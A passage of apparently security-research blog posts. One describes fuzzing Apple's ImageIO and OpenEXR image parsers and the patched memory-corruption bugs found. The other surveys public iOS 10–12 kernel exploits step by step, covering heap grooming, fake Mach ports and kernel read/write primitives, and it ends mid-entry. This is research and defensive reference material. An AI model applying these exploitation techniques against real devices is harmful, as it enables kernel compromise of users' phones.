IIO_Reader_ICNS::testHeader
IIO_Reader_ICO::testHeader
IIO_Reader_JP2::testHeader
IIO_Reader_KTX::testHeader
IIO_Reader_LibJPEG::testHeader
IIO_Reader_MPO::testHeader
IIO_Reader_OpenEXR::testHeader
IIO_Reader_PBM::testHeader
IIO_Reader_PDF::testHeader
IIO_Reader_PICT::testHeader  (macOS only)
IIO_Reader_PNG::testHeader
IIO_Reader_PSD::testHeader
IIO_Reader_PVR::testHeader
IIO_Reader_RAD::testHeader
IIO_Reader_SGI::testHeader  (macOS only)
IIO_Reader_TGA::testHeader
IIO_Reader_TIFF::testHeader

While this list contains many familiar formats (JPEG, PNG, GIF, …) there are numerous rather exotic ones as well (KTX and ASTC, apparently used for textures or AI: Adobe Illustrator Artwork) and some that appear to be specific to the Apple ecosystem (ICNS for icons, ATX likely for Animojis)

Support for the different formats also varies. Some formats appear fully supported and are often implemented using what appear to be the open source parsing library which can be found in /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources on macOS: libGIF.dylib, libJP2.dylib, libJPEG.dylib, libOpenEXR.dylib, libPng.dylib, libRadiance.dylib, and libTIFF.dylib. Other formats seem to have only rudimentary support for handling the most common cases.

Finally, some formats (e.g. PSD), also appear to support out-of-process decoding (on macOS this is handled by /System/Library/Frameworks/ImageIO.framework/Versions/A/XPCServices/ImageIOXPCService.xpc) which can help sandbox vulnerabilities in the parsers. It does not, however, seem to be possible to specify whether parsing should be performed in-process or out-of-process in the public APIs, and no attempt was made to change the default behaviour.

Fuzzing Closed Source Image Parsers


Given the wide range of available image formats and the fact that no source code is available for the majority of the code, fuzzing seemed like the obvious choice. 

The choice of which fuzzer and fuzzing approach to use was not so obvious. Since the majority of the target code was not open source, many standard tools were not directly applicable. Further, I had decided to limit fuzzing to a single Mac Mini for simplicity. Thus, the fuzzer should:
  1. Run with as little overhead as possible to fully utilize the available compute resources, and
  2. Make use some kind of code coverage guidance
In the end I decided to implement something myself on top of Honggfuzz. The idea for the fuzzing approach is loosely based on the paper: Full-speed Fuzzing: Reducing Fuzzing Overhead through Coverage-guided Tracing 
and achieves lightweight, low-overhead coverage guided fuzzing for closed source code by: 

  1. Enumerating the start offset of every basic block in the program/library. This is done with a simple IDAPython script
  2. At runtime, in the fuzzed process, replacing the first byte of every undiscovered basic block with a breakpoint instruction (int3 on Intel). The original byte and the corresponding offset in the coverage bitmap are stored in a dedicated shadow memory mapping whose address can be computed from the address of the modified library, and
  3. Installing a SIGTRAP handler that will:
    1. Retrieve the faulting address and compute the offset in the library as well as the address of the corresponding entry in the shadow memory
    2. Mark the basic block as found in the global coverage bitmap
    3. Replace the breakpoint with the original byte
    4. Resume execution

As only undiscovered basic blocks are instrumented and since every breakpoint is only triggered once, the runtime overhead quickly approaches zero. It should, however, be noted that this approach only achieves basic block coverage and not edge coverage as used for example by AFL and which, for closed source targets, can be achieved through dynamic binary instrumentation albeit with some performance overhead. It will thus be more “coarse grained” and for example treat different transitions to the same basic block as equal whereas AFL would not. As such, this approach will likely find fewer vulnerabilities given the same number of iterations. I deemed this acceptable as the goal of this research was not to perform thorough discovery of all vulnerabilities but rather to quickly test the robustness of the image parsing code and highlight the attack vector. Thorough fuzzing, in any case, is always best performed by the maintainers with source code access.

The described approach was fairly easy to implement by patching honggfuzz’s client instrumentation code and writing an IDAPython script to enumerate the basic block offsets. Both patch and IDAPython script can be found here

The fuzzer then started from a small corpus of around 700 seed images covering the supported image formats and ran for multiple weeks. In the end, the following vulnerabilities were identified:

A bug in the usage of libTiff by ImageIO which caused controlled data to be written past the end of a memory buffer. No CVE was assigned for this issue likely because it had already been discovered internally by Apple before we reported it.

An out-of-bounds read on the heap when processing DDS images with invalid size parameters.

An out-of-bounds write on the heap when processing JPEG images with an optimized parser. 

Possibly an off-by-one error in the PVR decoding logic leading to an additional row of pixel data being written out-of-bounds past the end of the output buffer.

A related bug in the PVR decoder leading to an out-of-bounds read which likely had the same root cause as P0 Issue 1974 and thus was assigned the same CVE number.

An out-of-bounds read during handling of OpenEXR images.

The last issue was somewhat special as it occurred in 3rd party code bundled with ImageIO, namely that of the OpenEXR library. As that library is open source, I decided to fuzz it separately as well. 

OpenEXR


OpenEXR is “a high dynamic-range (HDR) image file format [...] for use in computer imaging applications”. The parser is implemented in C and C++ and can be found on github.
As described above, the OpenEXR library is exposed through Apple’s ImageIO framework and therefore is exposed as a 0click attack surface through various popular messenger apps on Apple devices. It is likely that the attack surface is not limited to messaging apps, though I haven't conducted additional research to support that claim.

As the library is open source, “conventional” guided fuzzing is much easier to perform. I used a Google internal, coverage-guided fuzzer running on roughly 500 cores for around two weeks. The fuzzer was guided by edge coverage using llvm’s SanitizerCoverage and generated new inputs by mutating existing ones using common binary mutation strategies and starting from a set of roughly 80 existing OpenEXR images as seeds.  

Eight likely unique vulnerabilities were identified and reported as P0 issue 1987 to the OpenEXR maintainers, then fixed in the 2.4.1 release. They are briefly summarized next:

CVE-2020-11764
An out-of-bounds write (of presumably image pixels) on the heap in the copyIntoFrameBuffer function.

CVE-2020-11763
A bug that caused a std::vector to be read out-ouf-bounds. Afterwards, the calling code would write into an element slot of this vector, thus likely corrupting memory.

CVE-2020-11762
An out-of-bounds memcpy that was reading data out-of-bounds and afterwards potentially writing it out-of-bounds as well.

CVE-2020-11760, CVE-2020-11761, CVE-2020-11758
Various out-of-bounds reads of pixel data and other data structures.

CVE-2020-11765
An out-of-bounds read on the stack, likely due to an off-by-one error previously overwriting a string null terminator on the stack.

CVE-2020-11759
Likely an integer overflow issue leading to a write to a wild pointer.

Interestingly, the crash initially found by the ImageIO fuzzer (issue 1988) did not appear to be reproducible in the upstream OpenEXR library and was thus reported directly to Apple. A possible explanation is that Apple was shipping an outdated version of the OpenEXR library and the bug had been fixed upstream in the meantime.

Recommendations


Media format parsing remains an important issue. This was also demonstrated by other researchers and vendor advisories, with the two following coming immediately to mind:

This of course suggests that continuous fuzz-testing of input parsers should occur on the vendor/code maintainer side. Further, allowing clients of a library like ImageIO to restrict the allowed input formats and potentially to opt-in to out-of-process decoding can help prevent exploitation.

On the messenger side, one recommendation is to reduce the attack surface by restricting the receiver to a small number of supported image formats (at least for message previews that don’t require interaction). In that case, the sender would then re-encode any unsupported image format prior to sending it to the receiver. In the case of ImageIO, that would reduce the attack surface from around 25 image formats down to just a handful or less.

Conclusion

This blog post described how image parsing code, as part of the operating system or third party libraries, end up being exposed to 0click attack surface through popular messengers. Fuzzing of the exposed code turned up numerous new vulnerabilities which have since been fixed. It is likely that, given enough effort (and exploit attempts granted due to automatically restarting services), some of the found vulnerabilities can be exploited for RCE in a 0click attack scenario. Unfortunately it is also likely that other bugs remain or will be introduced in the future. As such, continuous fuzz-testing of this and similar media format parsing code as well as aggressive attack-surface reduction, both in operating system libraries (in this case ImageIO) as well as messenger apps (by restricting the number of accepted image formats on the receiver) are recommended.

A survey of recent iOS kernel exploits

11 June 2020 at 19:42
By: Tim
Posted by Brandon Azad, Project Zero

I recently found myself wishing for a single online reference providing a brief summary of the high-level exploit flow of every public iOS kernel exploit in recent years; since no such document existed, I decided to create it here.

This post summarizes original iOS kernel exploits from local app context targeting iOS 10 through iOS 13, focusing on the high-level exploit flow from the initial primitive granted by the vulnerability to kernel read/write. At the end of this post, we will briefly look at iOS kernel exploit mitigations (in both hardware and software) and how they map onto the techniques used in the exploits.

This isn't your typical P0 blog post: There is no gripping zero-day exploitation, or novel exploitation research, or thrilling malware reverse engineering. The content has been written as a reference since I needed the information and figured that others might find it useful too. You have been forewarned.

A note on terminology

Unfortunately, there is no authoritative dictionary called "Technical Hacking Terms for Security Researchers", which makes it difficult to precisely describe some of the high-level concepts I want to convey. To that end, I have decided to ascribe the following terms specific meanings for the context of this post. If any of these definitions are at odds with your understanding of these terms, feel free to suggest improved terminology and I can update this post. :)

Exploit primitive: A capability granted during an exploit that is reasonably generic.

A few examples of common exploit primitives include: n-byte linear heap overflow, integer increment at a controlled address, write-what-where, arbitrary memory read/write, PC control, arbitrary function calling, etc.

A common exploit primitive specific to iOS kernel exploitation is having a send right to a fake Mach port (struct ipc_port) whose fields can be directly read and written from userspace.

Exploit strategy: The low-level, vulnerability-specific method used to turn the vulnerability into a useful exploit primitive.

For example, this is the exploit strategy used in Ian Beer's async_wake exploit for iOS 11.1.2:

An information leak is used to discover the address of arbitrary Mach ports. A page of ports is allocated and a specific port from that page is selected based on its address. The IOSurfaceRootUserClient bug is triggered to deallocate the Mach port, yielding a receive right to a dangling Mach port at a known (and partially controlled) address.

The last part is the generic/vulnerability-independent primitive that I interpret to be the end of the vulnerability-specific exploit strategy.

Typically, the aim of the exploit strategy is to produce an exploit primitive which is highly reliable.

Exploit technique: A reusable and reasonably generic strategy for turning one exploit primitive into another (usually more useful) exploit primitive.

One example of an exploit technique is Return-Oriented Programming (ROP), which turns arbitrary PC control into (nearly) arbitrary code execution by reusing executable code gadgets.

An exploit technique specific to iOS kernel exploitation is using a fake Mach port to read 4 bytes of kernel memory by calling pid_for_task() (turning a send right to a fake Mach port into an arbitrary kernel memory read primitive).

Exploit flow: The high-level, vulnerability-agnostic chain of exploit techniques used to turn the exploit primitive granted by the vulnerability into the final end goal (in this post, kernel read/write from local app context).

Public iOS kernel exploits from app context since iOS 10

This section will give a brief overview of iOS kernel exploits from local context targeting iOS 10 through iOS 13. I'll describe the high-level exploit flow and list the exploit primitives and techniques used to achieve it. While I have tried to track down every original (i.e., developed before exploit code was published) public exploit available either as source code or as a sufficiently complete writeup/presentation, I expect that I may have missed a few. Feel free to reach out and suggest any that I have missed and I can update this post.

For each exploit, I have outlined the vulnerability, the exploit strategy (specific to the vulnerability), and the subsequent exploit flow (generic). The boundary between which parts of the exploit are specific to the vulnerability and which parts are generic enough to be considered part of the overall flow is subjective. In each case I've highlighted the particular exploitation primitive granted by the vulnerability that I consider sufficiently generic.

mach_portal - iOS 10.1.1

By Ian Beer of Google Project Zero (@i41nbeer). 

The vulnerability: CVE-2016-7644 is a race condition in XNU's set_dp_control_port() which leads to a Mach port being over-released.

Exploit strategy: Many Mach ports are allocated and references to them are dropped by racing set_dp_control_port() (it is possible to determine when the race has been won deterministically). The ports are freed by dropping a stashed reference, leaving the process holding receive rights to dangling Mach ports filling a page of memory.

Subsequent exploit flow: A zone garbage collection is forced by calling mach_zone_force_gc() and the page of dangling ports is reallocated with an out-of-line (OOL) ports array containing pointers to the host port. mach_port_get_context() is called on one of the dangling ports to disclose the address of the host port. Using this value, it is possible to guess the page on which the kernel task port lives. The context value of each of the dangling ports is set to the address of each potential ipc_port on the page containing the kernel task port, and the OOL ports are received back in userspace to give a send right to the kernel task port.

In-the-wild iOS Exploit Chain 1 - iOS 10.1.1

Discovered in-the-wild by Clément Lecigne (@_clem1) of Google's Threat Analysis Group. Analyzed by Ian Beer and Samuel Groß (@5aelo) of Google Project Zero.

The vulnerability: The vulnerability is a linear heap out-of-bounds write of IOAccelResource pointers in the IOKit function AGXAllocationList2::initWithSharedResourceList().

Exploit strategy: The buffer to be overflowed is placed directly before a recv_msg_elem struct, such that the out-of-bounds write will overwrite the uio pointer with an IOAccelResource pointer. The IOAccelResource pointer is freed and reallocated with a fake uio struct living at the start of an OSData data buffer managed by IOSurface properties. The uio is freed, leaving a dangling OSData data buffer accessible via IOSurface properties.

Subsequent exploit flow: The dangling OSData data buffer slot is reallocated with an IOSurfaceRootUserClient instance, and the data contents are read via IOSurface properties to give the KASLR slide, the address of the current task, and the address of the dangling data buffer/IOSurfaceRootUserClient. Then, the data buffer is freed and reallocated with a modified version of the IOSurfaceRootUserClient, such that calling an external method on the modified user client will return the address of the kernel task read from the kernel's __DATA segment. The data buffer is freed and reallocated again such that calling an external method will execute the OSSerializer::serialize() gadget, leading to an arbitrary read-then-write that stores the address of the kernel task port in the current task's list of special ports. Reading the special port from userspace gives a send right to the kernel task port.

extra_recipe - iOS 10.2

By Ian Beer.

The vulnerability: CVE-2017-2370 is a linear heap buffer overflow reachable from unprivileged contexts in XNU's mach_voucher_extract_attr_recipe_trap() due to an attacker-controlled userspace pointer used as the length in a call to copyin().

Exploit strategy: The vulnerable Mach trap is called to create a kalloc allocation and immediately overflow out of it with controlled data, corrupting the ikm_size field of a subsequent ipc_kmsg object. This causes the ipc_kmsg, which is the preallocated message for a Mach port, to believe that it has a larger capacity than it does, overlapping it with the first 240 bytes of the subsequent allocation. By registering the Mach port as the exception port for a userspace thread and then crashing the thread with controlled register state, it is possible to repeatedly and reliably overwrite the overlapping part of the subsequent allocation, and by receiving the exception message it is possible to read those bytes. This gives a controlled 240-byte out-of-bounds read/write primitive off the end of the corrupted ipc_kmsg.

Subsequent exploit flow: A second ipc_kmsg is placed after the corrupted one and read in order to determine the address of the allocations. Next an AGXCommandQueue user client is reallocated in the same slot and the virtual method table is read to determine the KASLR slide. Then the virtual method table is overwritten such that a virtual method call on the AGXCommandQueue invokes the OSSerializer::serialize() gadget, producing a 2-argument arbitrary kernel function call primitive. Calling the function uuid_copy() gives an arbitrary kernel read/write primitive.

Yalu102 - iOS 10.2

By Luca Todesco (@qwertyoruiopz) and Marco Grassi (@marcograss).

The vulnerability: CVE-2017-2370 (same as above).

Exploit strategy: The vulnerable Mach trap is called to create a kalloc allocation and immediately overflow out of it with controlled data, overwriting the contents of an OOL port array and inserting a pointer to a fake Mach port in userspace. Receiving the message containing the OOL ports yields a send right to the fake Mach port whose contents can be controlled directly.

Subsequent exploit flow: The fake Mach port is converted into a clock port and clock_sleep_trap() is used to brute force a kernel image pointer. Then the port is converted into a fake task port to read memory via pid_for_task(). Kernel memory is scanned backwards from the leaked kernel image pointer until the kernel text base is located, breaking KASLR. Finally, a fake kernel task port is constructed.

Notes: The exploit does not work with PAN enabled.

References: Yalu102 exploit code.

ziVA - iOS 10.3.1

By Adam Donenfeld (@doadam) of Zimperium.

The vulnerability: Multiple vulnerabilities in AppleAVE2 due to external methods sharing IOSurface pointers with userspace and trusting IOSurface pointers read from userspace.

Exploit strategy: An IOSurface object is created and an AppleAVE2 external method is called to leak its address. The vtable of an IOFence pointer in the IOSurface is leaked using another external method call, breaking KASLR. The IOSurface object is freed and reallocated with controlled data using an IOSurface property spray. Supplying the leaked pointer to an AppleAVE2 external method that trusts IOSurface pointers supplied from userspace allows hijacking a virtual method call on the fake IOSurface; this is treated as a oneshot hijacked virtual method call with a controlled target object at a known address.

Subsequent exploit flow: The hijacked virtual method call is used with the OSSerializer::serialize() gadget to call copyin() and overwrite 2 sysctl_oid structs. The sysctls are overwritten such that reading the first sysctl calls copyin() to update the function pointer and arguments for the second sysctl and reading the second sysctl uses the OSSerializer::serialize() gadget to call the kernel function with 3 arguments. This 3-argument arbitrary kernel function call primitive is used to read and write arbitrary memory by calling copyin()/copyout().

Notes: iOS 10.3 introduced the initial form of task_conversion_eval(), a weak mitigation that blocks userspace from accessing a right to the real kernel task port. Any exploit after iOS 10.3 needs to build a fake kernel task port instead.

async_wake - iOS 11.1.2

By Ian Beer.

The vulnerability: CVE-2017-13861 is a vulnerability in IOSurfaceRootUserClient::s_set_surface_notify() that causes an extra reference to be dropped on a Mach port. CVE-2017-13865 is a vulnerability in XNU's proc_list_uptrs() that leaks kernel pointers by failing to fully initialize heap memory before copying out the contents to userspace.

Exploit strategy: The information leak is used to discover the address of arbitrary Mach ports. A page of ports is allocated and a specific port from that page is selected based on its address. The port is deallocated using the IOSurfaceRootUserClient bug, yielding a receive right to a dangling Mach port at a known (and partially controlled) address.

Subsequent exploit flow: The other ports on that page are freed and a zone garbage collection is forced so that the page is reallocated with the contents of an ipc_kmsg, giving a fake Mach port with controlled contents at a known address. The reallocation converted the port into a fake task port through which arbitrary kernel memory can be read using pid_for_task(). (The address to read is updated without reallocating the fake port by using mach_port_set_context().) Relevant kernel objects are located using the kernel read primitive and the fake port is reallocated again with a fake kernel task port.

Notes: iOS 11 removed the mach_zone_force_gc() function which allowed userspace to prompt the kernel to perform a zone garbage collection, reclaiming all-free virtual pages in the zone map for use by other zones. Exploits for iOS 11 and later needed to develop a technique to force a zone garbage collection. At least three independent techniques have been developed to do so, demonstrated in async_wake, v0rtex, and In-the-wild iOS exploit chain 3.

In-the-wild iOS Exploit Chain 2 - iOS 10.3.3

Discovered in-the-wild by Clément Lecigne. Analyzed by Ian Beer and Samuel Groß.

The vulnerability: CVE-2017-13861 (same as above).

Exploit strategy: Two Mach ports, port A and port B, are allocated as part of a spray. The vulnerability is triggered to drop a reference on port A, and the ports surrounding A are freed, leading to a dangling port pointer. Zone garbage collection is forced by calling mach_zone_force_gc() and the page containing port A is reallocated with an OOL ports spray containing a pattern such that port A's ip_context field overlaps a pointer to port B. Calling mach_port_get_context() gives the address of port B. The vulnerability is triggered again with port B, leading to a receive right to a dangling Mach port at a known address.

Subsequent exploit flow: After another zone garbage collection, the dangling port B is reallocated with a segmented OOL memory spray such that calling mach_port_get_context() can identify which 4 MB segment of the spray reallocated port B. That segment is freed and port B is reallocated with pipe buffers, giving a controlled fake Mach port at a known address. The fake port is converted into a clock port and clock_sleep_trap() is used to brute force KASLR. The fake port is next converted into a fake task port and a 4-byte kernel read primitive is established using pid_for_task(). Finally, the fake port is converted into a fake kernel task port.

v0rtex - iOS 10.3.3

By Siguza (@S1guza).

The vulnerability: CVE-2017-13861 (same as above).

Exploit strategy: Mach ports are sprayed and a reference on one port is dropped using the vulnerability. The other ports on the page are freed, leaving a receive right to a dangling Mach port.

Subsequent exploit flow: A zone garbage collection is forced using mach_zone_force_gc() and the page containing the dangling port is reallocated with an OSString buffer via an IOSurface property spray. The OSString buffer contains a pattern that initializes critical fields of the port and allows the index of the OSString containing the port to be determined by calling mach_port_get_context() on the fake port. The OSString containing the fake port is freed and reallocated as a normal Mach port. mach_port_request_notification() is called to put the address of a real Mach port in the fake port's ip_pdrequest field, and the OSString's contents are read via IOSurface to get the address. mach_port_request_notification() is used again to get the address of the fake port itself.

The string buffer is freed and reallocated such that mach_port_get_attributes() can be used as a 4-byte arbitrary read primitive, with the target address to read updateable via mach_port_set_context(). (This is analogous to the pid_for_task() technique, but with slightly different constraints.) Starting at the address of the real Mach port, kernel memory is read to find relevant kernel objects. The string buffer is freed and reallocated again with a fake task port sufficient to remap the string buffer into the process's address space. The fake port is updated via the mapping to yield a 7-argument arbitrary kernel function call primitive using iokit_user_client_trap(), and kernel functions are called to generate a fake kernel task port.

Incomplete exploit for CVE-2018-4150 bpf-filter-poc - iOS 11.2.6

Vulnerability analysis and POC by Chris Wade (@cmwdotme) at Corellium. Exploit by littlelailo (@littlelailo).

The vulnerability: CVE-2018-4150 is a race condition in XNU's BPF subsystem which leads to a linear heap buffer overflow due to a buffer length being increased without reallocating the corresponding buffer.

Exploit strategy: The race is triggered to incorrectly increase the length of the buffer without reallocating the buffer itself. A packet is sent and stored in the buffer, overflowing into a subsequent OOL ports array and inserting a pointer to a fake Mach port in userspace. Receiving the message containing the OOL ports yields a send right to the fake Mach port whose contents can be controlled directly.

Subsequent exploit flow: The fake Mach port is converted into a clock port and clock_sleep_trap() is used to brute force a kernel image pointer. Then the port is converted into a fake task port to read memory via pid_for_task(). Kernel memory is scanned backwards from the leaked kernel image pointer until the kernel text base is located, breaking KASLR. The final part of the exploit is incomplete, but construction of a fake kernel task port at this stage would be straightforward and deterministic using existing code.

Notes: The exploit does not work with PAN enabled.

multi_path - iOS 11.3.1

By Ian Beer.

The vulnerability: CVE-2018-4241 is an intra-object linear heap buffer overflow in XNU's mptcp_usr_connectx() due to incorrect bounds checking.

Exploit strategy: The kernel heap is groomed to place a 2048-byte ipc_kmsg struct at a 16 MB aligned address below the mptses structs (the object containing the overflow) associated with a few multipath TCP sockets. The vulnerability is used to overwrite the lower 3 bytes of the mpte_itfinfo pointer in the mptses struct with zeros and the socket is closed. This triggers a kfree() of the corrupted pointer, freeing the ipc_kmsg struct at the 16 MB alignment boundary. The freed ipc_kmsg slot is reallocated with sprayed pipe buffers. The vulnerability is triggered again to overwrite the lower 3 bytes of the mpte_itfinfo pointer in another mptses struct with zeros and the socket is closed, causing another kfree() of the same address. This frees the pipe buffer that was just allocated into that slot, leaving a dangling pipe buffer.

Subsequent exploit flow: The slot is reallocated again with a preallocated ipc_kmsg. A userspace thread is crashed to cause a message to be stored in the preallocated ipc_kmsg buffer overlapping the pipe buffer; reading the pipe in userspace yields the contents of the ipc_kmsg struct, giving the address of the dangling pipe buffer/ipc_kmsg. The pipe is written to change the contents of the ipc_kmsg struct such that receiving the message yields a send right to a fake Mach port inside the pipe buffer. The exception message is received and the pipe is rewritten to convert the fake port into a kernel read primitive using pid_for_task(). Relevant kernel objects are located and the fake port is converted into a fake kernel task port.

multipath_kfree - iOS 11.3.1

By John Åkerblom (@jaakerblom).

The vulnerability: CVE-2018-4241 (same as above).

Exploit strategy: The kernel heap is groomed to place preallocated 4096-byte ipc_kmsg structs near the mptses structs for a few multipath TCP sockets. The vulnerability is triggered twice to corrupt the lower 2 bytes of the mpte_itfinfo pointer in two mptses structs, such that closing the sockets results in kfree()s of the two corrupted pointers. Each pointer is corrupted to point 0x7a0 bytes into an ipc_kmsg allocation, creating 4096-byte holes spanning 2 messages. A Mach port containing one of the partially-freed ipc_kmsg structs (with the ipc_kmsg header intact but the message contents freed) is located by using mach_port_peek() to detect a corrupted msgh_id field. Once the port is found, the hole is reallocated by spraying preallocated ipc_kmsg structs and a message is placed in each. Filling the hole overlaps the original (partially freed) ipc_kmsg's Mach message contents with the ipc_kmsg header of the replacement, such that receiving the message on the original port reads the contents of the replacement ipc_kmsg header. The header contains a pointer to itself, disclosing the address of the replacement ipc_kmsg allocation. The vulnerability is triggered a third time to free the replacement message, leaving a partially freed preallocated ipc_kmsg at a known address.

Subsequent exploit flow: The hole in the corrupted ipc_kmsg is reallocated by spraying AGXCommandQueue user clients. A message is received on the Mach port in userspace, copying out the contents of the AGXCommandQueue object, from which the vtable is used to determine the KASLR slide. Then the corrupted ipc_kmsg is freed and reallocated by spraying more preallocated ipc_kmsg structs with a slightly different internal layout allowing more control over the contents. A message is placed in each of the just-sprayed ipc_kmsg structs to modify the overlapping AGXCommandQueue and hijack a virtual method call; the hijacked virtual method uses the OSSerializer::serialize() gadget to call copyout(), which is used to identify which of the sprayed AGXCommandQueue user clients overlaps the slot from the corrupted ipc_kmsg. The contents of each of the just-sprayed preallocated ipc_kmsg structs is updated in turn to identify which port corresponds to the corrupted ipc_kmsg. The preallocated port and user client port are used together to build a 3-argument arbitrary kernel function call primitive by updating the contents of the AGXCommandQueue object through an exception message sent to the preallocated port.

empty_list - iOS 11.3.1

By Ian Beer.

The vulnerability: CVE-2018-4243 is a partially controlled 8-byte heap out-of-bounds write in XNU's getvolattrlist() due to incorrect bounds checking.

Exploit strategy: Due to significant triggering constraints, the vulnerability is treated as an 8-byte heap out-of-bounds write of zeros off the end of a kalloc.16 allocation. The kernel heap is groomed into a pattern of alternating blocks for the zones of kalloc.16 and ipc.ports, and further grooming reverses the kalloc.16 freelist. The vulnerability is repeatedly triggered after freeing various kalloc.16 allocations until a kalloc.16 allocation at the end of a block is overflowed, corrupting the first 8 bytes of the first ipc_port on the subsequent page. The corrupted port is freed by calling mach_port_set_attributes(), leaving the process holding a receive right to a dangling Mach port.

Subsequent exploit flow: A zone garbage collection is forced and the dangling port is reallocated with an OOL ports array containing a pointer to another Mach port overlapping the ip_context field, so that the address of the other port is retrieved by calling mach_port_get_context(). The dangling port is then reallocated with pipe buffers and converted into a kernel read primitive using pid_for_task(). Using the address of the other port as a starting point, relevant kernel objects are located. Finally, the fake port is converted into a fake kernel task port.

In-the-wild iOS Exploit Chain 3 - iOS 11.4

Discovered in-the-wild by Clément Lecigne. Analyzed by Ian Beer and Samuel Groß.

The vulnerability: The vulnerability is a double-free reachable from AppleVXD393UserClient::DestroyDecoder() (the class name varies by hardware) due to failing to clear a freed pointer.

Exploit strategy: The target 56-byte allocation is created and freed, leaving the dangling pointer intact. The slot is reallocated with an OSData buffer using an IOSurface property spray. The vulnerable method is called again to free the buffer, leaving a dangling OSData buffer. The slot is reallocated again with an OOL ports array containing a single target Mach port pointer and the contents are read in userspace via IOSurface properties, yielding the address of the port. The vulnerable method is called once more to free the OOL ports and the slot is reallocated with another OSData buffer containing two pointers to the Mach port. The holding port holding the OOL descriptor is destroyed, dropping two references to the Mach port. This leaves the process with a receive right to a dangling Mach port at a known address.

Subsequent exploit flow: A zone garbage collection is performed and the dangling port is reallocated with a segmented OOL memory spray such that calling mach_port_get_context() can identify which segment of the spray reallocated the port. That segment is freed and the dangling port is reallocated with pipe buffers, giving a controlled fake Mach port at a known address. The fake port is converted into a clock port and clock_sleep_trap() is used to brute force KASLR. The fake port is next converted into a fake task port and a kernel read primitive is established using pid_for_task(). Finally, the fake port is converted into a fake kernel task port.

Spice - iOS 11.4.1

Vulnerability analysis and POC by Luca Moro (@JohnCool__) at Synacktiv. Exploit by Siguza, Viktor Oreshkin (@stek29), Ben Sparkes (@iBSparkes), and littlelailo.

The vulnerability: The "LightSpeed" vulnerability (possibly CVE-2018-4344) is a race condition in XNU's lio_listio() due to improper state management that results in a use-after-free.

Exploit strategy: The vulnerable function is called in a loop in one thread to repeatedly trigger the vulnerability by allocating a buffer from kalloc.16 and racing to free the buffer twice. Another thread repeatedly sends a message containing an OOL ports array allocated from kalloc.16, immediately sprays a large number of kalloc.16 allocations containing a pointer to a fake Mach port in userspace via IOSurface properties, and receives the OOL ports. When the race is won, the double-free can cause the OOL ports array to be freed, and the subsequent spray can reallocate the slot with a fake OOL ports array. Receiving the OOL ports in userspace gives a receive right to a fake Mach port whose contents can be controlled directly.

Subsequent exploit flow: A second Mach port is registered as a notification port on the fake port, disclosing the address of the second port in the fake port's ip_pdrequest field. The fake port is modified to construct a kernel read primitive using mach_port_get_attributes(). Starting from the disclosed port pointer, kernel memory is read to find relevant kernel objects. The fake port is converted into a fake user client port providing a 7-argument arbitrary kernel function call primitive using iokit_user_client_trap(). Finally, a fake kernel task port is constructed.

Notes: The exploit does not work with PAN enabled.

The analysis was performed on the implementation in the file pwn.m, since this seems to provide the most direct comparison to the other exploit implementations in this list.

treadm1ll - iOS 11.4.1

Vulnerability analysis and POC by Luca Moro. Exploit by Tihmstar (@tihmstar).

The vulnerability: The "LightSpeed" vulnerability (same as above).

Exploit strategy: The vulnerable function is called in a loop in one thread to repeatedly trigger the vulnerability by allocating a buffer from kalloc.16 and racing to free the buffer twice. Another thread sends a fixed number of messages containing an OOL ports array allocated from kalloc.16. When the race is won, the double-free can cause the OOL ports array to be freed, leaving a dangling OOL ports array pointer in some messages. The first thread stops triggering the vulnerability and a large number of IOSurface objects are created. Each message is received in turn and a large number of kalloc.16 allocations containing a pointer to a fake Mach port in userspace are sprayed using IOSurface properties. Each spray can reallocate a slot from a dangling OOL ports array with a fake OOL ports array. Successfully receiving the OOL ports in userspace gives a receive right to a fake Mach port whose contents can be controlled directly.

Subsequent exploit flow: A second Mach port is registered as a notification port on the fake port, disclosing the address of the second port in the fake port's ip_pdrequest field. The fake port is modified to construct a kernel read primitive using pid_for_task(). Starting from the disclosed port pointer, kernel memory is read to find relevant kernel objects. The fake port is converted into a fake user client port providing a 7-argument arbitrary kernel function call primitive using iokit_user_client_trap(). Finally, a fake kernel task port is constructed.

Notes: The exploit does not work with PAN enabled.

Chaos - iOS 12.1.2

By Qixun Zhao (@S0rryMybad) of Qihoo 360 Vulcan Team.

The vulnerability: CVE-2019-6225 is a use-after-free due to XNU's task_swap_mach_voucher() failing to comply with MIG lifetime semantics that results in an extra reference being added or dropped on an ipc_voucher object.

Exploit strategy: A large number of ipc_voucher objects are sprayed and the vulnerability is triggered twice to decrease the reference count on a voucher and free it. The remaining vouchers on the page are freed and a zone garbage collection is forced, leaving a dangling ipc_voucher pointer in the thread's ith_voucher field.

Subsequent exploit flow: The dangling voucher is reallocated by an OSString buffer using an IOSurface property spray. thread_get_mach_voucher() is called to obtain a send right to a newly allocated voucher port for the voucher, which causes a pointer to the voucher port to be stored in the fake voucher overlapping the OSString buffer; reading the OSString property discloses the address of the voucher port. The OSString overlapping the fake voucher is freed and reallocated with a large spray that both forces the allocation of controlled data containing a fake Mach port at a hardcoded address and updates the fake voucher's iv_port pointer to point to the fake Mach port. thread_get_mach_voucher() is called again to obtain a send right to the fake port and to identify which OSString buffer contains the fake Mach port. This leaves the process with a send right to a fake Mach port in an IOSurface property buffer at a known address (roughly equivalent to a dangling Mach port). A kernel read primitive is built by reallocating the OSString buffer to convert the fake port into a fake task port and calling pid_for_task() to read arbitrary memory. Relevant kernel objects are located and the fake port is converted into a fake map port to remap the fake port into userspace, removing the need to reallocate it. Finally the fake port is converted into a fake kernel task port.

Notes: The A12 introduced PAC, which limits the ability to use certain exploitation techniques involving code pointers (e.g. vtable hijacking). Also, iOS 12 introduced a mitigation in ipc_port_finalize() against freeing a port while it is still active (i.e. hasn't been destroyed, for example because a process still holds a right to it). This changed the common structure of past exploits whereby a port would be freed while a process still held a right to it. Possibly as a result, obtaining a right to a fake port in iOS 12+ exploits seems to occur later in the flow than in earlier exploits.

voucher_swap - iOS 12.1.2

By Brandon Azad (@_bazad) of Google Project Zero.

The vulnerability: CVE-2019-6225 (same as above).

Exploit strategy: The kernel heap is groomed to put a block of ipc_port allocations directly before a block of pipe buffers. A large number of ipc_voucher objects are sprayed and the vulnerability is triggered to decrease the reference count on a voucher and free it. The remaining vouchers on the page are freed and a zone garbage collection is forced, leaving a dangling ipc_voucher pointer in the thread's ith_voucher field.

